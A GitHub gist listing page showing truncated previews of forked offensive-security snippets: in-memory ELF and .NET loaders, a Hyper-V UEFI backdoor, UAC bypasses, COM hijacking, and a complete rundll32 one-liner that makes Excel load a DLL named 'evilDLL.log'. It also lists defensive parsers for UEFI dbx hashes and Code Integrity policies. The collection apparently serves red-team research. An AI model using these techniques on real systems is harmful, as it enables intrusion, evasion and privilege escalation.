Skip to content

Instantly share code, notes, and snippets.

View deki0r's full-sized avatar

deki0r deki0r

56 followers · 468 following
View GitHub Profile
@deki0r
deki0r / WoW64_call.cpp
Created December 11, 2018 02:26 — forked from Cr4sh/WoW64_call.cpp
WoW64 Heaven's Gate
#include "stdafx.h"
#define DB(_val_) __asm __emit (_val_)
#define INVALID_SYSCALL (DWORD)(-1)
// code selectors
#define CS_32 0x23
#define CS_64 0x33
@deki0r
deki0r / mem-loader.asm
Created October 13, 2018 06:23 — forked from zznop/mem-loader.asm
Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by https://x-c3ll.github.io/posts/fileless-memfd_create/)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;;; Copyright (C), zznop, zznop0x90@gmail.com
;;;
;;; This software may be modified and distributed under the terms
;;; of the MIT license. See the LICENSE file for details.
;;;
;;; DESCRIPTION
;;;
;;; This PoC shellcode is meant to be compiled as a blob and prepended to a ELF
@deki0r
deki0r / LoadInMemoryModule.ps1
Created April 23, 2018 01:07 — forked from mattifestation/LoadInMemoryModule.ps1
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
$TypeBuilder.CreateType()
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA
@deki0r
deki0r / AtomicRedTeam.sct
Created October 9, 2017 02:19
Sample COM Hijacking Atomic Red Team Test
<?XML version="1.0"?>
<scriptlet>
<registration
description="AtomicRedTeam"
progid="AtomicRedTeam"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
@deki0r
deki0r / dbxhashoutput.csv
Created September 4, 2017 01:27 — forked from mattifestation/dbxhashoutput.csv
A basic "dbx" UEFI variable parser to dump blacklisted UEFI bootloader hashes
SignatureOwner SHA256Hash
00000000-0000-0000-0000-000000000000 6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
77fa9abd-0359-4d32-bd60-28f4e78f784b 80B4D96931BF0D02FD91A61E19D14F1DA452E66DB2408CA8604D411F92659F0A
77fa9abd-0359-4d32-bd60-28f4e78f784b F52F83A3FA9CFBD6920F722824DBE4034534D25B8507246B3B957DAC6E1BCE7A
77fa9abd-0359-4d32-bd60-28f4e78f784b C5D9D8A186E2C82D09AFAA2A6F7F2E73870D3E64F72C4E08EF67796A840F0FBD
77fa9abd-0359-4d32-bd60-28f4e78f784b 363384D14D1F2E0B7815626484C459AD57A318EF4396266048D058C5A19BBF76
77fa9abd-0359-4d32-bd60-28f4e78f784b 1AEC84B84B6C65A51220A9BE7181965230210D62D6D33C48999C6B295A2B0A06
77fa9abd-0359-4d32-bd60-28f4e78f784b E6CA68E94146629AF03F69C2F86E6BEF62F930B37C6FBCC878B78DF98C0334E5
77fa9abd-0359-4d32-bd60-28f4e78f784b C3A99A460DA464A057C3586D83CEF5F4AE08B7103979ED8932742DF0ED530C66
77fa9abd-0359-4d32-bd60-28f4e78f784b 58FB941AEF95A25943B3FB5F2510A0DF3FE44C58C95E0AB80487297568AB9771
@deki0r
deki0r / DmaHvBackdoor.c
Created August 18, 2017 11:20 — forked from Cr4sh/DmaHvBackdoor.c
Hyper-V backdoor for UEFI
/*
*********************************************************************
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which being called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)
@deki0r
deki0r / akagi_41.c
Created August 16, 2017 07:48 — forked from hfiref0x/akagi_41.c
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@deki0r
deki0r / excel.bat
Created July 12, 2017 04:02 — forked from ryhanson/ExcelXLL.md
Execute DLL via the Excel.Application object's RegisterXLL() method
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
@deki0r
deki0r / CIPolicyParser.ps1
Created May 8, 2017 09:42 — forked from mattifestation/CIPolicyParser.ps1
Functions to recover information from binary Device Guard Code Integrity policies.
function ConvertTo-CIPolicy {
<#
.SYNOPSIS
Converts a binary file that contains a Code Integrity policy into XML format.
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
.DESCRIPTION
@deki0r
deki0r / EventVwrBypass.cs
Created May 5, 2017 04:03 — forked from leoloobeek/EventVwrBypass.cs
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass